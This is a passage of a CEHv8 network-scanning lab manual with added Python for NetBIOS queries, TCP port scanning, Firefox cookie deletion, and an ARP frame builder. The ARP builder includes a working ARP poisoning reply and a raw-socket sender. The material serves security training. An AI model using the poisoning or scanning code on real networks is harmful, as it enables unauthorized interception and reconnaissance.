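    """Node status request for the wildcard name '*' (what nbtstat -A and NetBIOS scanners send to UDP/137)."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)      # QDCOUNT = 1
    return header + encode_nb_name(b"*" + b"\x00" * 15) + struct.pack("!HH", NBSTAT, 1)


def _skip_name(data: bytes, off: int) -> int:
    while data[off]:
        off += data[off] + 1
    return off + 1


def parse_nbstat_response(data: bytes) -> dict:
    """Extract the name table and the adapter MAC (UNIT_ID) from a node status response."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a response, or no answer record")
    off = 12
    for _ in range(qdcount):                 # responses normally echo no question, but be tolerant
        off = _skip_name(data, off) + 4
    off = _skip_name(data, off)
    rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("answer record is not NBSTAT")
    num_names, off = data[off], off + 1
    names = []
    for _ in range(num_names):               # 15 bytes name, 1 byte suffix, 2 bytes NAME_FLAGS
        raw, suffix = data[off:off + 15], data[off + 15]
        nflags = struct.unpack("!H", data[off + 16:off + 18])[0]
        names.append({"name": raw.rstrip(b" \x00").decode("ascii", "replace"),
                      "suffix": suffix,
                      "type": NB_SUFFIXES.get(suffix, "0x%02X" % suffix),
                      "group": bool(nflags & 0x8000),    # G bit: group (e.g. workgroup) vs unique name
                      "active": bool(nflags & 0x0400)})  # ACT bit
        off += 18
    mac = data[off:off + 6]                  # UNIT_ID: first field of the statistics block
    return {"txid": txid, "names": names, "mac": "-".join("%02X" % b for b in mac)}


def make_sample_response(txid: int) -> bytes:
    """Constructed response (not captured traffic) for a host LABHOST in workgroup WORKGROUP."""
    def entry(name, suffix, group):
        return name.ljust(15).encode() + bytes([suffix]) + struct.pack("!H", 0x0400 | (0x8000 if group else 0))
    table = entry("LABHOST", 0x00, False) + entry("LABHOST", 0x20, False) + entry("WORKGROUP", 0x00, True)
    rdata = bytes([3]) + table + bytes.fromhex("001122334455") + b"\x00" * 40   # made-up MAC, empty stats
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)     # QR=1, AA=1, ANCOUNT=1
    answer = encode_nb_name(b"*" + b"\x00" * 15) + struct.pack("!HHIH", NBSTAT, 1, 0, len(rdata))
    return header + answer + rdata


def nbstat_query(ip: str, timeout: float = 2.0) -> dict:
    """Query a live host (assumed to answer on UDP/137) and parse its name table."""
    txid = os.getpid() & 0xFFFF
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_request(txid), (ip, 137))
        data, _ = s.recvfrom(1024)
    result = parse_nbstat_response(data)
    if result["txid"] != txid:
        raise ValueError("transaction id mismatch")
    return result


if __name__ == "__main__":
    for n in parse_nbstat_response(make_sample_response(0xBEEF))["names"]:
        print("%-15s <%02X> %-6s %s" % (n["name"], n["suffix"], "GROUP" if n["group"] else "UNIQUE", n["type"]))
```

The suffix byte is what turns a bare name into intelligence: the same string LABHOST appears once with <00> (workstation service) and once with <20> (file server, i.e. SMB shares are offered), and the group flag separates the workgroup or domain name from the machine name.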

10. Right-click the IP address. In this lab, the selected IP is 10.0.0.4; it will be different in your network.

TASK 3: Traceroute

11. Then, right-click and select the Traceroute option.


[Screenshot: MegaPing NetBIOS Scanner results with the context menu for a host open, showing Expand, Export To File, Merge Hosts, Open Share, View Hotfix Details, Apply Hot Fixes, Copy selected item, Copy selected row, Copy all results, Save As, and Traceroute (Traceroutes the selection)]

Other features include: a multithreaded design that allows any number of requests in any tool to be processed at the same time, real-time network connection status and protocol statistics, real-time process information and usage, real-time network information including network connections and open network files, system tray support, and more.

FIGURE 15.8: MegaPing Traceroute

12. It will open the Traceroute window, and will trace the IP address selected.

[Screenshot: MegaPing Traceroute tool with Destination 10.0.0.4 in the Destination Address List; the hop list shows the traces to the host at 10.0.0.4 and to ADMIN-PC [10.0.0.6], both marked Complete]

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

FIGURE 15.9: MegaPing Traceroute Report

TASK 4: Port Scanning

13. Select Port Scanner from the left pane and add www.certifiedhacker.com in the Destination Address List, then click the Start button.

14. After clicking the Start button it toggles to Stop.

15. It will list the ports associated with www.certifiedhacker.com with the keyword, risk, and port number.


[Screenshot: MegaPing Port Scanner for www.certifiedhacker.com, Protocols: TCP and UDP, Scan Type: Authorized Ports, Scanning 51% complete. Results so far: TCP ftp (File Transfer [Control]) risk Elevated; TCP www-http (World Wide Web HTTP) Elevated; UDP tcpmux (TCP Port Service Multiplexer) Elevated; UDP compressnet (Management Utility, Compression Process) Low; UDP rje (Remote Job Entry) Low; UDP echo (Echo) Low; UDP discard (Discard) Low]

MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports.

FIGURE 15.10: MegaPing Port Scanning Report
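Steps 13 to 15 show the Port Scanner reporting ports with their IANA keyword and a risk rating. The Python script below is an added example, not code from the lab manual or from MegaPing, of the TCP connect scan such a tool performs: a completed three-way handshake means the port is open, a RST (connection refused) means closed, and no answer within the timeout means filtered. It starts a throwaway listener on 127.0.0.1 as a constructed target so the result can be checked offline; only scan hosts you are authorized to test. Two caveats a practitioner should keep in mind: a connect scan completes the handshake, so the target service logs the connection, and the keyword column is a lookup by port number from the services database, not a fingerprint of what is actually listening.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Fallback keywords (IANA assignments) for hosts whose services database is missing.
_FALLBACK_KEYWORDS = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "domain", 80: "http",
                      110: "pop3", 135: "epmap", 139: "netbios-ssn", 443: "https",
                      445: "microsoft-ds", 3389: "ms-wbt-server"}


def service_name(port: int, proto: str = "tcp") -> str:
    """Port number -> IANA keyword (the scanner's 'Keyword' column). A table lookup only:
    it says what usually lives on the port, not what is actually listening there."""
    try:
        return socket.getservbyport(port, proto)
    except OSError:
        return _FALLBACK_KEYWORDS.get(port, "unknown")


def probe(host: str, port: int, timeout: float = 0.5) -> str:
    """TCP connect scan of one port: 'open' if the handshake completes, 'closed' on RST
    (connection refused), 'filtered' when nothing comes back or the path is unreachable."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, OSError):
            return "filtered"


def scan(host: str, ports, workers: int = 64, timeout: float = 0.5) -> dict:
    """Probe `ports` concurrently; return {port: (state, keyword)} for every probed port."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return {p: (state, service_name(p)) for p, state in zip(ports, states)}


def open_ports(results: dict) -> list:
    """Only the open ports, sorted, the way a scanner's result list presents them."""
    return sorted(p for p, (state, _) in results.items() if state == "open")


def demo() -> dict:
    """Run the scanner against a constructed local target: one listening port and one known-closed port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # kernel picks a free port; never accept()ed, yet the handshake completes
    listener.listen(5)
    open_port = listener.getsockname()[1]
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tmp:
        tmp.bind(("127.0.0.1", 0))           # reserve a second free port, then release it: guaranteed closed
        closed_port = tmp.getsockname()[1]
    try:
        results = scan("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
    return {"open_port": open_port, "closed_port": closed_port, "results": results}


if __name__ == "__main__":
    report = demo()
    for port, (state, keyword) in sorted(report["results"].items()):
        print("TCP %5d %-9s %s" % (port, state, keyword))
```

Against a real target you would pass `scan(host, range(1, 1025))` and feed `open_ports()` into banner grabbing; the `filtered` state is the one worth a second look, since it usually means a firewall rather than an absent service.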

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.

Tool/Utility: MegaPing
Information Collected/Objectives Achieved:
  IP Scan Range: 10.0.0.1 - 10.0.0.254
  Performed Actions:
  ■ IP Scanning
  ■ NetBIOS Scanning
  ■ Traceroute
  ■ Port Scanning
  Result:
  ■ List of Active Hosts
  ■ NetBIOS Name
  ■ Adapter Name


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. How does MegaPing detect security vulnerabilities on the network?

2. Examine the report generation of MegaPing.

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Lab

Detect, Delete and Block Google Cookies Using G-Zapper

G-Zapper is a utility to block Google cookies, clean Google cookies, and help you stay anonymous while searching online.

Lab Scenario

You have learned in the previous lab that the MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. It provides detailed information about all computers and network appliances. It scans your entire network and provides information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, etc. Scan results can be saved in HTML or TXT reports, which can be used to secure your network.

As an administrator, you can organize safety measures by shutting down unnecessary ports, closing shares, etc. to block attackers from intruding into the network. As another aspect of prevention you can use G-Zapper, which blocks Google cookies, cleans Google cookies, and helps you stay anonymous while searching online. This way you can protect your identity and search history.

Lab Objectives

This lab explains how G-Zapper automatically detects and cleans the Google cookie each time you use your web browser.

Lab Environment

To carry out the lab, you need:


■ G-Zapper is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Anonymizers\G-Zapper
■ You can also download the latest version of G-Zapper from the link http://www.dummysoftware.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Install G-Zapper in Windows Server 2012 by following the wizard-driven installation steps
■ Administrative privileges to run tools
■ A computer running Windows Server 2012

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration

Time: 10 Minutes

Overview of G-Zapper

G-Zapper helps protect your identity and search history. G-Zapper will read the Google cookie installed on your PC, display the date it was installed, determine how long your searches have been tracked, and display your Google searches. G-Zapper allows you to automatically delete or entirely block the Google search cookie from future installation. Note that deleting the cookie only breaks the link between one series of searches and the next; it does not hide your IP address or browser characteristics from the search provider.

Lab Tasks

TASK 1: Detect & Delete Google Cookies

1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

[Screenshot: Windows Server 2012 desktop]

FIGURE 16.1: Windows Server 2012 - Desktop view

2. Click the G-Zapper app to open the G-Zapper window.


[Screenshot: Windows Server 2012 Start screen with the G-Zapper tile among the installed apps]

G-Zapper is compatible with Windows 95, 98, ME, NT, 2000, XP, Vista, Windows 7.

FIGURE 16.2: Windows Server 2012 - Apps

3. The G-Zapper main window will appear as shown in the following screenshot.

[Screenshot: G-Zapper - TRIAL VERSION main window. It explains that Google stores a unique identifier in a cookie on your PC which allows them to track the keywords you search for, reports that a Google Tracking ID exists on this PC (Chrome), shows the date the cookie was installed and how long searches have been tracked (here 13 hours), and notes that no Google searches were found in Internet Explorer or Firefox. The How to Use It panel says: to delete the Google cookie, click the Delete Cookie button; your identity will be obscured from previous searches and G-Zapper will regularly clean future cookies; to restore the Google search cookie click the Restore Cookie button. Buttons: Delete Cookie, Restore Cookie, Test Google, Settings, Register]

FIGURE 16.3: G-Zapper main window

4. To delete the Google search cookies, click the Delete Cookie button; a window will appear that gives information about the deleted cookie location. Click OK.


[Screenshot: G-Zapper message box: "The Google search cookie was removed and will be re-created with a new ID upon visiting www.google.com. The cookie was located at (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite", OK button. The main window now offers Delete Cookie, Block Cookie, Test Google, Settings and Register, and notes that Gmail and Adsense will be unavailable with the cookie blocked]

A new cookie will be generated upon your next visit to Google, breaking the chain that relates your searches.

FIGURE 16.4: Deleting search cookies

5. To block the Google search cookie, click the Block Cookie button. A window appears asking if you want to manually block the Google cookie. Click Yes.

Note: The tiny tray icon runs in the background, takes up very little space, and can notify you by sound and animation when the Google cookie is blocked.

[Screenshot: "Manually Blocking the Google Cookie" dialog: "Gmail and other Google services will be unavailable while the cookie is manually blocked. If you use these services, we recommend not blocking the cookie and instead allow G-Zapper to regularly clean the cookie automatically. Are you sure you wish to manually block the Google cookie?" Buttons: Yes, No.]

FIGURE 16.5: Block Google cookie

6. A message appears stating that the Google cookie has been blocked. Click OK.


Note: G-Zapper can also clean your Google search history in Internet Explorer and Mozilla Firefox. It's far too easy for someone using your PC to get a glimpse of what you've been searching for.

[Screenshot: G-Zapper message box: "The Google cookie has been blocked. You may now search anonymously on google.com. Click the Test Google button to verify."]

FIGURE 16.6: Block Google cookie (2)

7. To test that the Google cookie has been blocked, click the Test Google button.

8. Your default web browser opens Google's Preferences page. Click OK.
you've been
[Screenshot: Google Preferences page in the browser. It reports "Your cookies seem to be disabled. Setting preferences will not work until you enable cookies in your browser."]

FIGURE 16.7: Cookies disabled message

9. To view the deleted cookie information, click the Settings button, and then click View Log in the Cleaned Cookies Log section.


Note: You can simply run G-Zapper, minimize the window, and enjoy your enhanced search privacy.

[Screenshot: G-Zapper Settings dialog. Sounds: Play sound effect when a cookie is deleted (default.wav; Preview, Browse). Google Analytics Tracking: Block Google Analytics from tracking websites that I visit. Cleaned Cookies Log: Enable logging of cookies that have recently been cleaned (Clear Log, View Log); Save my Google ID in the cleaned cookies log. Button: OK.]

FIGURE 16.8: Viewing the deleted logs

10. The deleted cookies information opens in Notepad (file cookiescleaned):

    (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 10:42:13 AM
    (Chrome) C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies Friday, August 31, 2012 11:04:20 AM
    (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 11:06:23 AM
    (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Wednesday, September 05, 2012 02:52:38 PM

Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks.

FIGURE 16.9: Deleted logs report
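The procedure above is driven through G-Zapper's buttons. The following Python script is an added example, not G-Zapper's code and not part of the original lab, that performs the same detect and delete steps directly against a Firefox cookies.sqlite file: it finds every cookie scoped to a Google domain, reads the tracking identifier out of the PREF cookie (its ID= field is the 16-hex-digit value G-Zapper reports as your Google ID) together with the time the cookie was created, and deletes the Google cookies so that a fresh ID is issued on the next visit. The moz_cookies table is cut down to the columns the example needs (real profiles carry more), the sample rows are constructed, and G-Zapper's blocking step is not reproduced because the manual does not say how it is implemented.

```python
import re
import sqlite3
from datetime import datetime, timezone

# Cut-down moz_cookies schema (assumption: real Firefox profiles have more columns,
# but name/value/host/creationTime exist). creationTime is in microseconds since
# the Unix epoch, expiry in seconds.
SCHEMA = """
CREATE TABLE moz_cookies (
    id INTEGER PRIMARY KEY,
    name TEXT, value TEXT, host TEXT, path TEXT,
    expiry INTEGER, creationTime INTEGER
)"""

# Matches a cookie host of google.<tld> or any subdomain of it (".google.com", "www.google.co.uk").
GOOGLE_HOST = re.compile(r"(^|\.)google\.[a-z.]+$")

# The PREF cookie's ID= field is the 16-hex-digit identifier G-Zapper displays as the Google ID.
PREF_ID = re.compile(r"(?:^|:)ID=([0-9a-f]{16})")


def open_profile(path=":memory:"):
    """Open a cookies.sqlite file. Copy the file first if Firefox is running: it holds a lock."""
    return sqlite3.connect(path)


def build_sample_db():
    """Constructed sample profile: the PREF tracking cookie, a second Google cookie, an unrelated one."""
    con = open_profile()
    con.executescript(SCHEMA)
    installed = datetime(2012, 9, 5, 1, 54, 46, tzinfo=timezone.utc)   # date shown in Figure 16.3
    created_us = int(installed.timestamp() * 1_000_000)
    con.executemany(
        "INSERT INTO moz_cookies (name, value, host, path, expiry, creationTime) VALUES (?,?,?,?,?,?)",
        [
            ("PREF", "ID=6b4b4d9fe5c60cc1:TM=1346810086:LM=1346810086:S=constructed",
             ".google.com", "/", 1409886086, created_us),
            ("NID", "67=constructed", ".google.com", "/", 1362600000, created_us),
            ("sid", "deadbeef", "example.org", "/", 1362600000, created_us),
        ],
    )
    con.commit()
    return con


def find_google_cookies(con):
    """Detect: every cookie whose host is a Google domain, as (name, value, host, creationTime)."""
    rows = con.execute("SELECT name, value, host, creationTime FROM moz_cookies").fetchall()
    return [r for r in rows if GOOGLE_HOST.search(r[2])]


def google_tracking_id(con, now=None):
    """Return (tracking id, install time, hours tracked) from the PREF cookie, or None if absent."""
    now = now or datetime.now(timezone.utc)
    for name, value, _host, created_us in find_google_cookies(con):
        m = PREF_ID.search(value) if name == "PREF" else None
        if m:
            installed = datetime.fromtimestamp(created_us / 1_000_000, tz=timezone.utc)
            return m.group(1), installed, (now - installed).total_seconds() / 3600
    return None


def delete_google_cookies(con):
    """Delete: remove every Google-scoped cookie; Google issues a fresh ID on the next visit."""
    ids = [row_id for row_id, host in con.execute("SELECT id, host FROM moz_cookies")
           if GOOGLE_HOST.search(host)]
    con.executemany("DELETE FROM moz_cookies WHERE id = ?", [(i,) for i in ids])
    con.commit()
    return len(ids)


if __name__ == "__main__":
    db = build_sample_db()
    print("tracking id / installed / hours tracked:", google_tracking_id(db))
    print("deleted", delete_google_cookies(db), "Google cookies; remaining:", find_google_cookies(db))
```

To run it against a real profile, call open_profile() with the cookies.sqlite path from Figure 16.4 on a copy of the file, since Firefox keeps the live database locked. Chrome's Cookies file (the second path in the log above) is also SQLite but uses a different table layout and, in current versions, encrypts the value column, so the same query does not carry over unchanged.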

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.


Tool/Utility: G-Zapper
Information Collected/Objectives Achieved:
  Action Performed:
  ■ Detect the cookies
  ■ Delete the cookies
  ■ Block the cookies
  Result: Deleted cookies are stored in C:\Users\Administrator\Application Data

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Examine how G-Zapper automatically cleans Google cookies.

2. Check to see if G-Zapper is blocking cookies on sites other than Google.

Internet Connection Required

[x] Yes   [ ] No

Platform Supported

[x] Classroom   [ ] iLabs


Lab

Scanning the Network Using the Colasoft Packet Builder

The Colasoft Packet Builder is a useful tool for creating custom network packets.

Lab Scenario

In the previous lab you learned how you can detect, delete, and block cookies. Attackers exploit XSS vulnerabilities, which involve an attacker pushing malicious JavaScript code into a web application. When another user visits a page with that malicious code in it, the user's browser will execute the code. The browser has no way of telling the difference between legitimate and malicious code. Injected code is another mechanism that an attacker can use for session hijacking: by default (unless the HttpOnly flag is set), cookies stored by the browser can be read by JavaScript code. The injected code can read a user's cookies and transmit those cookies to the attacker.

As an expert ethical hacker and penetration tester you should be able to prevent such attacks by validating all headers, cookies, query strings, form fields, and hidden fields, encoding input and output, filtering metacharacters in the input, and using a web application firewall to block the execution of malicious scripts.

Another way to check a network's defenses is to send it custom-built packets using the Colasoft Packet Builder. In this lab you will learn how to build and send a custom packet (an ARP frame), the building block of techniques such as ARP poisoning, network spoofing, and DNS poisoning.

Lab Objectives

The objective of this lab is to reinforce concepts of network security policy, policy enforcement, and policy audits.

Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks.

Lab Environment

In this lab, you need:

■ Colasoft Packet Builder located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Custom Packet Creator\Colasoft Packet Builder
■ A computer running Windows Server 2012 as host machine
■ Windows 8 running on a virtual machine as target machine
■ You can also download the latest version of Colasoft Packet Builder from the link http://www.colasoft.com/download/products/download_packet_builder.php
■ If you decide to download the latest version, then the screenshots shown in the lab might differ.
■ A web browser with Internet connection running on the host machine

Lab Duration

Time: 10 Minutes

Overview of Colasoft Packet Builder

Colasoft Packet Builder creates and sends custom network packets. This tool can be used to verify network protection against attacks and intruders. Colasoft Packet Builder features a decoding editor that lets users edit specific protocol field values much more easily.

Users are also able to edit decoding information in two editors: Decode Editor and Hex Editor. Users can select any one of the provided templates: Ethernet Packet, IP Packet, ARP Packet, or TCP Packet.

Lab Tasks

Task 1: Scanning Network

1. Install and launch the Colasoft Packet Builder.

2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 17.1: Windows Server 2012 - Desktop view

3. Click the Colasoft Packet Builder 1.0 app to open the Colasoft Packet Builder window.

Note: You can download Colasoft Packet Builder from http://www.colasoft.com.


[Screenshot: Windows Server 2012 Start screen showing the Colasoft Packet Builder 1.0 tile among the installed apps.]

FIGURE 17.2: Windows Server 2012 - Apps

4. The Colasoft Packet Builder main window appears.

[Screenshot: Colasoft Packet Builder main window. Menu: File, Edit, Send, Help. Toolbar: Import, Export, Add, Insert, Checksum, Send, Send All, Adapter. Panes: Decode Editor ("No packet selected"), Packet List (Packets 0, Selected 0; columns No., Delta Time, Source, Destination) and Hex Editor (Total 0 bytes).]

Note: Operating system requirements: Windows Server 2003 and 64-bit Edition, Windows 2008 and 64-bit Edition, Windows 7 and 64-bit Edition.

FIGURE 17.3: Colasoft Packet Builder main screen

5. Before starting your task, check that the Adapter settings are set to default and then click OK.

[Screenshot: Select Adapter dialog. Physical Address D4:BE:D9:C3:CE:2D; Link Speed 100.0 Mbps; Max Frame Size 1500 bytes; IP Address 10.0.0.7/255.255.255.0; Default Gateway 10.0.0.1; Adapter Status Operational. Buttons: OK, Cancel, Help.]

FIGURE 17.4: Colasoft Packet Builder Adapter settings


6. To add or create the packet, click Add in the menu section.

Note: There are two ways to create a packet, Add and Insert. The difference between them is the newly added packet's position in the Packet List: the new packet is listed as the last packet in the list if added, but after the current packet if inserted.

FIGURE 17.5: Colasoft Packet Builder creating the packet

7. When the Add Packet dialog box pops up, select the template (here ARP Packet, with a Delta Time of 0.1 second) and click OK.

Note: Colasoft Packet Builder supports *.cscpkt (Capsa 5.x and 6.x Packet File) and *.cpf (Capsa 4.0 Packet File) formats. You may also import data from *.cap (Network Associates Sniffer packet files), *.pkt (EtherPeek v7/TokenPeek/AiroPeek v9/OmniPeek v9 packet files), *.dmp (TCPDUMP), and *.rawpkt (raw packet files).

FIGURE 17.6: Colasoft Packet Builder Add Packet dialog box

8. You can view the added packets list on the right-hand side of your window.

Task 2: Decode Editor

[Screenshot: Packet List (Packets 1, Selected 1): No. 1, Delta Time 0.100000, Source 00:00:00:00:00:00, Destination FF:FF:FF:FF:FF:FF.]

FIGURE 17.7: Colasoft Packet Builder Packet List

9. Colasoft Packet Builder allows you to edit the decoding information in the two editors: Decode Editor and Hex Editor.


Decode Editor (Packet Num: 000001, Length: 64), with [offset/length] of each field:

    Ethernet Type II [0/14]
        Destination Address: FF:FF:FF:FF:FF:FF [0/6]
        Source Address: 00:00:00:00:00:00 [6/6]
        Protocol: 0x0806 (ARP) [12/2]
    ARP - Address Resolution Protocol [14/28]
        Hardware Type: 1 (Ethernet) [14/2]
        Protocol Type: 0x0800 [16/2]
        Hardware Address Length: 6 [18/1]
        Protocol Address Length: 4 [19/1]
        Type: 1 (ARP Request) [20/2]
        Source Physical: 00:00:00:00:00:00 [22/6]
        Source IP: 0.0.0.0 [28/4]
        Destination Physical: 00:00:00:00:00:00 [32/6]
        Destination IP: 0.0.0.0 [38/4]
    Extra Data: [42/18]
        Number of Bytes: 18 bytes [42/18]
    FCS:
        FCS: 0xF577BDD9

Note: Burst Mode option: If you check this option, Colasoft Packet Builder sends packets one after another without intermission. If you want to send packets at the original delta time, do not check this option.

FIGURE 17.8: Colasoft Packet Builder Decode Editor

Hex Editor (Total 60 bytes):

    0000 FF FF FF FF FF FF 00 00 00 00 00 00 08 06
    000E 00 01 08 00 06 04 00 01 00 00 00 00 00 00
    001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    002A 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0038 00 00 00 00

FIGURE 17.9: Colasoft Packet Builder Hex Editor

10. To send all packets at one time, click Send All from the menu bar.

11. Check the Burst Mode option in the Send All Packets dialog window, and then click Start.

Note: Option, Loop Sending: This defines the number of times the sending execution is repeated, one time by default. Enter zero if you want to keep sending packets until you pause or stop it manually.

[Screenshot: toolbar with Checksum, Send, Send All, and the Packet List showing packet 1, Delta Time 0.100000, Source 00:00:00:00:00:00, Destination FF:FF:FF:FF:FF:FF.]

FIGURE 17.10: Colasoft Packet Builder Send All button


Note: Select a packet from the packet listing to activate the Send All button.

FIGURE 17.11: Colasoft Packet Builder Send All Packets

12. Click Start.

[Screenshot: Send All Packets dialog. Options: Adapter: Realtek PCIe GBE Family Controller (Select...); Burst Mode (no delay between packets); Loop Sending: 1 loops (zero for infinite loop); Delay Between Loops: 1000 milliseconds. Sending Information: Total Packets: 1; Packets Sent: 1; Progress bar. Buttons: Start, Stop, Close, Help.]

Note: The progress bar presents an overview of the sending process you are engaged in at the moment.

FIGURE 17.12: Colasoft Packet Builder Send All Packets

13. To export the packets sent, from the File menu select File -> Export -> All Packets.

[Screenshot: File menu with Import..., Export > (All Packets..., Selected Packets...), Exit.]

FIGURE 17.13: Export All Packets option

Note: Option, Packets Sent: This shows the number of packets sent successfully. Colasoft Packet Builder also displays the packets sent unsuccessfully, if there is a packet not sent out.

[Screenshot: Save As dialog. File name: Packets.cscpkt; Save as type: Colasoft Packet File (v6) (*.cscpkt).]

FIGURE 17.14: Select a location to save the exported file

FIGURE 17.15: Colasoft Packet Builder exporting packet (Packets.cscpkt)
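Figures 17.8 and 17.9 show what the ARP template produces. The following Python script is an added example, not Colasoft's code and not part of the original lab, that builds the same 60-byte frame byte for byte from its fields, decodes a frame back into the field list the Decode Editor shows, prints the hex dump in the 14-bytes-per-row layout of Figure 17.9, and computes the CRC-32 FCS that the network card appends (the Decode Editor's "Length: 64" is the 60 bytes plus that 4-byte FCS; the FCS value displayed by the tool is not checked here). It also builds the frame a practitioner would actually send with this tool: an unsolicited ARP reply that binds the gateway address from Figure 17.4 (10.0.0.1) to an attacker MAC and targets the lab host 10.0.0.7 at D4:BE:D9:C3:CE:2D, which is the ARP poisoning packet the scenario mentions. The attacker MAC 00:11:22:33:44:55 is a constructed value. The send_frame helper uses a Linux AF_PACKET raw socket, which needs root; Colasoft does the equivalent through its own driver on Windows.

```python
import socket
import struct
import zlib

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"
MIN_FRAME = 60  # Ethernet minimum without FCS; the template pads to this ("Extra Data")


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_frame(op=ARP_REQUEST, dst=BROADCAST_MAC, src=ZERO_MAC,
                    sender_mac=ZERO_MAC, sender_ip="0.0.0.0",
                    target_mac=ZERO_MAC, target_ip="0.0.0.0"):
    """Ethernet II header + 28-byte ARP body, zero-padded to 60 bytes. Defaults reproduce Figure 17.9."""
    ethernet = mac_bytes(dst) + mac_bytes(src) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    frame = ethernet + arp
    return frame + b"\x00" * max(0, MIN_FRAME - len(frame))


def decode_arp_frame(frame):
    """Return the fields the Decode Editor shows. Raises ValueError for non-ARP frames."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETH_P_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04x}")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol combination")
    return {
        "destination": mac_str(frame[0:6]),
        "source": mac_str(frame[6:12]),
        "opcode": op,                       # 1 = request, 2 = reply
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
        "extra_bytes": len(frame) - 42,     # padding, 18 for a minimum-size frame
    }


def frame_fcs(frame):
    """CRC-32 over the frame, the value the NIC appends (least-significant byte first) as the FCS."""
    return zlib.crc32(frame) & 0xFFFFFFFF


def hexdump(frame, width=14):
    """Offset + bytes per row, 14 per row like the Colasoft Hex Editor."""
    return "\n".join(
        f"{off:04X} " + " ".join(f"{b:02X}" for b in frame[off:off + width])
        for off in range(0, len(frame), width)
    )


def build_poison_reply(gateway_ip, victim_ip, victim_mac, attacker_mac):
    """Unsolicited ARP reply telling the victim that gateway_ip lives at attacker_mac."""
    return build_arp_frame(ARP_REPLY, dst=victim_mac, src=attacker_mac,
                           sender_mac=attacker_mac, sender_ip=gateway_ip,
                           target_mac=victim_mac, target_ip=victim_ip)


def send_frame(frame, interface):
    """Put the raw frame on the wire (Linux AF_PACKET, requires CAP_NET_RAW / root)."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((interface, 0))
        return s.send(frame)


if __name__ == "__main__":
    template = build_arp_frame()
    print(hexdump(template))
    print(decode_arp_frame(template), f"FCS: 0x{frame_fcs(template):08X}")
    # Constructed attacker MAC; gateway, victim IP and victim MAC come from Figure 17.4.
    reply = build_poison_reply("10.0.0.1", "10.0.0.7", "d4:be:d9:c3:ce:2d", "00:11:22:33:44:55")
    print(decode_arp_frame(reply))
```

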